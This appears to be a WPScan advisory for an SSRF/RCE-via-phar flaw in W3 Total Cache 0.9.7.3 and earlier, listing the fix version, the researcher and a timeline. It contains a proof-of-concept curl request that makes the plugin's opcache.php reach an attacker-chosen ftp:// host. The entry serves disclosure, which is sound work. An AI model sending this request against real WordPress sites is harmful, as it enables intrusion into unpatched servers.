W3 Total Cache <= 0.9.7.3 - SSRF / RCE via phar



Description
The implementation of `opcache_flush_file` calls `file_exists` with a parameter fully controlled by the user.
Proof of Concept
curl 'http://x.x.x.x/wp-content/plugins/w3-total-cache/pub/opcache.php' --data 'nonce=974ca6ad15021a6668e7ae02e1be551c&command=flush_file&file=ftp://y.y.y.y:zzzz/' 

Affects Plugin

fixed in version 0.9.7.4

References

URL https://plugins.trac.wordpress.org/changeset/2081515/w3-total-cache#file24

Classification

Type MULTI

Miscellaneous

Original Researcher Thomas Chauchefoin
Views 5588
Verified Yes
WPVDB ID 9270

Timeline

Publicly Published 2019-05-06 (5 months ago)
Added 2019-05-06 (5 months ago)
Last Updated 2019-05-07 (5 months ago)

Our Other Services

Online WordPress Vulnerability Scanner WPScan WordPress Security Plugin